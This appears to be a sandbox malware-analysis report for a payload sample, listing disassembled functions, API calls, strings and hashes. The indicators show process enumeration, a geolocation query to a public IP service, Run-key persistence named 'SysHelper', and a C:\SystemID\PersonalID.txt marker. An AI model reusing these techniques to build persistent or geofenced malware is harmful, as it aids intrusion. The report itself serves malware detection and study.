                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00472220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1412 472220-47228a call 48f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1415 4722bd-4722d1 K32EnumProcesses 1412->1415 1416 47228c-4722ba LoadLibraryW GetProcAddress * 3 1412->1416 1417 4722d3-4722de 1415->1417 1418 4722df-4722ec 1415->1418 1416->1415 1419 472353-47235b 1418->1419 1420 4722ee 1418->1420 1421 4722f0-472308 OpenProcess 1420->1421 1422 472346-472351 CloseHandle 1421->1422 1423 47230a-47231a K32EnumProcessModules 1421->1423 1422->1419 1422->1421 1423->1422 1424 47231c-472339 K32GetModuleBaseNameW call 480235 1423->1424 1426 47233e-472343 1424->1426 1426->1422 1427 472345 1426->1427 1427->1422
                                                                                                                            APIs
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00472235
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,?), ref: 00472240
                                                                                                                            • PathFindFileNameW.SHLWAPI(00000000), ref: 00472248
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00472256
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0047226A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00472275
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00472280
                                                                                                                            • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00472291
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0047229F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004722AA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004722B5
                                                                                                                            • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004722CD
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004722FE
                                                                                                                            • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00472315
                                                                                                                            • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0047232C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00472347
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                            • API String ID: 3668891214-3807497772
                                                                                                                            • Opcode ID: 390e617f58ca9e7607a0167579456bde888d4115631908521194427c9c65c5f5
                                                                                                                            • Instruction ID: 221d24195813059d9f7e054a1b11b0153e51f2007fe3ad0ab9dcd21e75ba10bc
                                                                                                                            • Opcode Fuzzy Hash: 390e617f58ca9e7607a0167579456bde888d4115631908521194427c9c65c5f5
                                                                                                                            • Instruction Fuzzy Hash: 26315271E00219ABDB10AFA58C45EEFBBB8FF55705F00446AF904E3250EBB49E059FA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047F130 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 689sleeptimewindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM ref: 0047F15E
                                                                                                                            • Sleep.KERNEL32(?), ref: 0047F185
                                                                                                                            • Sleep.KERNEL32(?), ref: 0047F19D
                                                                                                                            • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 0047F9D0
                                                                                                                              • Part of subcall function 00470A50: GetLogicalDrives.KERNEL32 ref: 00470A75
                                                                                                                              • Part of subcall function 00470A50: SetErrorMode.KERNEL32(00000001,00560234,00000002), ref: 00470AE2
                                                                                                                              • Part of subcall function 00470A50: PathFileExistsA.SHLWAPI(?), ref: 00470AF9
                                                                                                                              • Part of subcall function 00470A50: SetErrorMode.KERNEL32(00000000), ref: 00470B02
                                                                                                                              • Part of subcall function 00470A50: GetDriveTypeA.KERNEL32(?), ref: 00470B1B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                                            • String ID: C:\
                                                                                                                            • API String ID: 3672571082-3404278061
                                                                                                                            • Opcode ID: c6db170e2198f42c0c0894c9c678765bd31fb39660e499feb5963e851f998cf2
                                                                                                                            • Instruction ID: 68f7eb96017d497588cfd4f7ada3a4044c988828f0c21cfa2e9e1836d8095c25
                                                                                                                            • Opcode Fuzzy Hash: c6db170e2198f42c0c0894c9c678765bd31fb39660e499feb5963e851f998cf2
                                                                                                                            • Instruction Fuzzy Hash: 5A4270B1D002059BDF24DFA8C945BDEBBF1BF44308F14852EE849AB381D779A909CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046CF10 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 228networkfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2028 46cf10-46cfb0 call 48f7c0 call 48b420 InternetOpenW call 475c10 InternetOpenUrlW 2035 46cfb2-46cfb4 2028->2035 2036 46cfb9-46cffb InternetReadFile InternetCloseHandle * 2 call 4756d0 2028->2036 2037 46d213-46d217 2035->2037 2041 46d000-46d01d 2036->2041 2039 46d224-46d236 2037->2039 2040 46d219-46d221 call 482587 2037->2040 2040->2039 2043 46d023-46d02c 2041->2043 2044 46d01f-46d021 2041->2044 2047 46d030-46d035 2043->2047 2046 46d039-46d069 call 4756d0 call 474300 2044->2046 2053 46d06f-46d08b call 473010 2046->2053 2054 46d1cb 2046->2054 2047->2047 2048 46d037 2047->2048 2048->2046 2060 46d08d-46d091 2053->2060 2061 46d0b9-46d0bd 2053->2061 2056 46d1cd-46d1d1 2054->2056 2058 46d1d3-46d1db call 482587 2056->2058 2059 46d1de-46d1f4 2056->2059 2058->2059 2063 46d1f6-46d1fe call 482587 2059->2063 2064 46d201-46d20f 2059->2064 2065 46d093-46d09b call 482587 2060->2065 2066 46d09e-46d0b4 call 473d40 2060->2066 2068 46d0bf-46d0ca call 482587 2061->2068 2069 46d0cd-46d0e1 call 474300 2061->2069 2063->2064 2064->2037 2065->2066 2066->2061 2068->2069 2069->2054 2079 46d0e7-46d149 call 473010 2069->2079 2082 46d150-46d15a 2079->2082 2083 46d160-46d162 2082->2083 2084 46d15c-46d15e 2082->2084 2086 46d165-46d16a 2083->2086 2085 46d16e-46d18b call 46b650 2084->2085 2090 46d18d-46d18f 2085->2090 2091 46d19a-46d19e 2085->2091 2086->2086 2087 46d16c 2086->2087 2087->2085 2090->2091 2093 46d191-46d198 2090->2093 2091->2082 2092 46d1a0 2091->2092 2094 46d1a2-46d1a6 2092->2094 2093->2091 2095 46d1c7-46d1c9 2093->2095 2096 46d1b3-46d1c5 2094->2096 2097 46d1a8-46d1b0 call 482587 2094->2097 2095->2094 2096->2056 2097->2096
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0046CF4A
                                                                                                                            • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0046CF5F
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0046CFA6
                                                                                                                            • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0046CFCD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0046CFDA
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0046CFDD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                            • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                            • API String ID: 1485416377-933853286
                                                                                                                            • Opcode ID: 25df1d65e1ad99928e052cd8ceda4bd4c0f4be5bbc62e4356164143f6ee3cae3
                                                                                                                            • Instruction ID: c14736529394499541c8d56160f7d7a3784d11cf2b20a6b4a897974c3928d28a
                                                                                                                            • Opcode Fuzzy Hash: 25df1d65e1ad99928e052cd8ceda4bd4c0f4be5bbc62e4356164143f6ee3cae3
                                                                                                                            • Instruction Fuzzy Hash: E591C371D00248EBEF20DFA0CD45BEEBBB4BF15708F20455AE4057B281E7BA5A49CB56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2100 47bae0-47bb0d 2101 47bb13 2100->2101 2102 47bba0-47bba7 2100->2102 2105 47bb15-47bb1a 2101->2105 2106 47bb54-47bb5e 2101->2106 2103 47bf3d-47bf47 2102->2103 2104 47bbad-47bbae 2102->2104 2111 47bf5c-47bf63 2103->2111 2112 47bf49 2103->2112 2107 47bbd7-47bc45 call 480c62 GetComputerNameW call 473100 call 47ce80 2104->2107 2108 47bbb0-47bbd4 DefWindowProcW 2104->2108 2109 47bb47-47bb4f PostQuitMessage 2105->2109 2110 47bb1c-47bb1f 2105->2110 2113 47bb64-47bb68 2106->2113 2114 47bf81-47bf97 2106->2114 2134 47bc47-47bc4c 2107->2134 2135 47bc7b-47bc80 2107->2135 2109->2114 2110->2114 2116 47bb25-47bb28 2110->2116 2118 47bf65-47bf71 IsWindow 2111->2118 2119 47bf9a-47bfc2 DefWindowProcW 2111->2119 2117 47bf50-47bf54 2112->2117 2120 47bb75-47bb9d DefWindowProcW 2113->2120 2121 47bb6a-47bb6e 2113->2121 2116->2108 2123 47bb2e-47bb31 2116->2123 2117->2119 2124 47bf56-47bf5a 2117->2124 2118->2114 2125 47bf73-47bf7b DestroyWindow 2118->2125 2121->2113 2126 47bb70 2121->2126 2123->2114 2128 47bb37-47bb42 call 471cd0 2123->2128 2124->2111 2124->2117 2125->2114 2126->2114 2128->2118 2138 47bc4e-47bc57 call 482587 2134->2138 2139 47bc5a-47bc76 call 4745a0 2134->2139 2136 47bc82-47bc8b call 482587 2135->2136 2137 47bc8e-47bcb1 2135->2137 2136->2137 2141 47bcb3-47bcbc call 482587 2137->2141 2142 47bcbf-47bcf1 call 480bed 2137->2142 2138->2139 2139->2135 2141->2142 2151 47bcf7-47bcfa 2142->2151 2152 47befb-47bf0f IsWindow 2142->2152 2155 47bd00-47bd04 2151->2155 2153 47bf11-47bf18 2152->2153 2154 47bf28-47bf2d 2152->2154 2153->2154 2156 47bf1a-47bf22 DestroyWindow 2153->2156 2154->2114 2157 47bf2f-47bf3b call 482587 2154->2157 2158 47bee5-47bef1 2155->2158 2159 47bd0a-47bd0e 2155->2159 2156->2154 2157->2114 2158->2155 2162 47bef7-47bef9 2158->2162 2159->2158 2161 47bd14-47bd7b call 474690 * 2 call 46eff0 2159->2161 2170 47bee1 2161->2170 2171 47bd81-47be44 call 47c330 call 479d10 call 47c240 call 47b680 call 47b8b0 call 474690 call 47ce80 call 4731d0 2161->2171 2162->2152 2162->2154 2170->2158 2188 47be46-47be52 call 482587 2171->2188 2189 47be55-47be81 2171->2189 2188->2189 2191 47be83-47be8c call 482587 2189->2191 2192 47be8f-47bedf CreateThread 2189->2192 2191->2192 2192->2158
                                                                                                                            APIs
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0047BB49
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0047BBBA
                                                                                                                            • _malloc.LIBCMT ref: 0047BBE4
                                                                                                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 0047BBF4
                                                                                                                            • _free.LIBCMT ref: 0047BCD7
                                                                                                                              • Part of subcall function 00471CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D12
                                                                                                                              • Part of subcall function 00471CD0: _memset.LIBCMT ref: 00471D3B
                                                                                                                              • Part of subcall function 00471CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00471D63
                                                                                                                              • Part of subcall function 00471CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D6C
                                                                                                                              • Part of subcall function 00471CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00471DD6
                                                                                                                              • Part of subcall function 00471CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00471E48
                                                                                                                            • IsWindow.USER32(?), ref: 0047BF69
                                                                                                                            • DestroyWindow.USER32(?), ref: 0047BF7B
                                                                                                                            • DefWindowProcW.USER32(?,00008003,?,?), ref: 0047BFA8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3873257347-0
                                                                                                                            • Opcode ID: 9556c2ef1e6e5dc8986cabb25e0ce3977408c11737112facd32b8638e331e190
                                                                                                                            • Instruction ID: e300812fae18947d0b77bc5eab625d4d4af3f88122f52ba344a76d4532f2ae2d
                                                                                                                            • Opcode Fuzzy Hash: 9556c2ef1e6e5dc8986cabb25e0ce3977408c11737112facd32b8638e331e190
                                                                                                                            • Instruction Fuzzy Hash: 9CC1AD71508340AFDB20DF24D8457ABBBE0FF95718F14891EF889933A1D7799808CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00483576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2346 483576-48358f 2347 4835a9-4835be call 48b420 2346->2347 2348 483591-48359b call 485208 call 4842d2 2346->2348 2347->2348 2353 4835c0-4835c3 2347->2353 2357 4835a0 2348->2357 2355 4835c5 2353->2355 2356 4835d7-4835dd 2353->2356 2358 4835cb-4835d5 call 485208 2355->2358 2359 4835c7-4835c9 2355->2359 2360 4835e9 call 48fb64 2356->2360 2361 4835df 2356->2361 2362 4835a2-4835a8 2357->2362 2358->2357 2359->2356 2359->2358 2367 4835ee-4835fa call 48f803 2360->2367 2361->2358 2364 4835e1-4835e7 2361->2364 2364->2358 2364->2360 2370 483600-48360c call 48f82d 2367->2370 2371 4837e5-4837ef call 4842fd 2367->2371 2370->2371 2376 483612-48361e call 48f857 2370->2376 2376->2371 2379 483624-48362b 2376->2379 2380 48369b-4836a6 call 48f939 2379->2380 2381 48362d 2379->2381 2380->2362 2387 4836ac-4836af 2380->2387 2383 48362f-483635 2381->2383 2384 483637-483653 call 48f939 2381->2384 2383->2380 2383->2384 2384->2362 2391 483659-48365c 2384->2391 2389 4836de-4836eb 2387->2389 2390 4836b1-4836ba call 48fbb4 2387->2390 2393 4836ed-4836fc call 4905a0 2389->2393 2390->2389 2399 4836bc-4836dc 2390->2399 2394 48379e-4837a0 2391->2394 2395 483662-48366b call 48fbb4 2391->2395 2402 483709-483730 call 4904f0 call 4905a0 2393->2402 2403 4836fe-483706 2393->2403 2394->2362 2395->2394 2404 483671-483689 call 48f939 2395->2404 2399->2393 2412 48373e-483765 call 4904f0 call 4905a0 2402->2412 2413 483732-48373b 2402->2413 2403->2402 2404->2362 2409 48368f-483696 2404->2409 2409->2394 2418 483773-483782 call 4904f0 2412->2418 2419 483767-483770 2412->2419 2413->2412 2422 4837af-4837c8 2418->2422 2423 483784 2418->2423 2419->2418 2426 4837ca-4837e3 2422->2426 2427 48379b 2422->2427 2424 48378a-483798 2423->2424 2425 483786-483788 2423->2425 2424->2427 2425->2424 2428 4837a5-4837a7 2425->2428 2426->2394 2427->2394 2428->2394 2429 4837a9 2428->2429 2429->2422 2430 4837ab-4837ad 2429->2430 2430->2394 2430->2422
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004835B1
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            • __gmtime64_s.LIBCMT ref: 0048364A
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00483680
                                                                                                                            • __gmtime64_s.LIBCMT ref: 0048369D
                                                                                                                            • __allrem.LIBCMT ref: 004836F3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0048370F
                                                                                                                            • __allrem.LIBCMT ref: 00483726
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00483744
                                                                                                                            • __allrem.LIBCMT ref: 0048375B
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00483779
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503770280-0
                                                                                                                            • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                            • Instruction ID: 40638daca53146679ffc2dc0bce7f7d1be40b88f96f6423534919253ec6f780a
                                                                                                                            • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                            • Instruction Fuzzy Hash: 2A71EBF1A00716BBD714BE6ACC41B5E73A4AF00B29F144A3BF914D6781E778EA408798
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2431 46c740-46c792 call 480fdd 2434 46c911-46c915 2431->2434 2435 46c798-46c7a3 call 480546 2431->2435 2436 46c917 2434->2436 2437 46c944-46c968 CreateDirectoryW call 480fdd 2434->2437 2444 46c906-46c90e call 483a38 2435->2444 2445 46c7a9 2435->2445 2440 46c920-46c93b call 474c60 2436->2440 2446 46c9af-46c9b3 2437->2446 2447 46c96a-46c96c 2437->2447 2440->2447 2457 46c93d-46c942 2440->2457 2444->2434 2450 46c7b0-46c7bc call 481101 2445->2450 2455 46c9b5 2446->2455 2456 46c9d8-46ca03 call 4828fd * 2 call 483a38 2446->2456 2452 46c972-46c976 2447->2452 2453 46ca43-46ca47 2447->2453 2458 46c7c1-46c7c6 2450->2458 2459 46c97c 2452->2459 2460 46ca3a-46ca40 call 482587 2452->2460 2462 46ca54-46ca64 2453->2462 2463 46ca49-46ca51 call 482587 2453->2463 2464 46c9b8-46c9bc 2455->2464 2456->2453 2499 46ca05-46ca09 2456->2499 2457->2437 2457->2440 2465 46c8f3-46c900 call 480546 2458->2465 2466 46c7cc-46c7e7 2458->2466 2468 46c980-46c984 2459->2468 2460->2453 2463->2462 2471 46c9c2 2464->2471 2472 46c9be-46c9c0 2464->2472 2465->2444 2465->2450 2474 46c7ed-46c7f3 2466->2474 2475 46c7e9-46c7eb 2466->2475 2478 46c986-46c98d call 482587 2468->2478 2479 46c990-46c9a8 2468->2479 2473 46c9c4-46c9d3 call 4828fd 2471->2473 2472->2473 2473->2464 2494 46c9d5 2473->2494 2484 46c7f6-46c7ff 2474->2484 2483 46c805-46c81e call 475c10 2475->2483 2478->2479 2479->2468 2488 46c9aa 2479->2488 2497 46c820-46c822 2483->2497 2498 46c861-46c863 2483->2498 2484->2484 2490 46c801-46c803 2484->2490 2488->2460 2490->2483 2494->2456 2497->2498 2502 46c824-46c83c 2497->2502 2500 46c874-46c876 2498->2500 2501 46c865-46c871 call 474f70 2498->2501 2499->2460 2503 46ca0b 2499->2503 2505 46c8d5-46c8e3 2500->2505 2506 46c878-46c88f 2500->2506 2501->2500 2507 46c83e-46c84a call 474f70 2502->2507 2508 46c84d-46c855 2502->2508 2509 46ca10-46ca14 2503->2509 2510 46c8e5-46c8ed call 482587 2505->2510 2511 46c8f0 2505->2511 2514 46c891-46c895 2506->2514 2515 46c8a9-46c8ae 2506->2515 2507->2508 2508->2505 2512 46c857-46c85f call 473160 2508->2512 2517 46ca16-46ca1d call 482587 2509->2517 2518 46ca20-46ca38 2509->2518 2510->2511 2511->2465 2512->2505 2522 46c897-46c8a7 call 4805a0 2514->2522 2523 46c8b5-46c8d1 2514->2523 2515->2523 2517->2518 2518->2460 2518->2509 2522->2523 2523->2505
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00480FDD: __wfsopen.LIBCMT ref: 00480FE8
                                                                                                                            • _fgetws.LIBCMT ref: 0046C7BC
                                                                                                                            • _memmove.LIBCMT ref: 0046C89F
                                                                                                                            • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0046C94B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
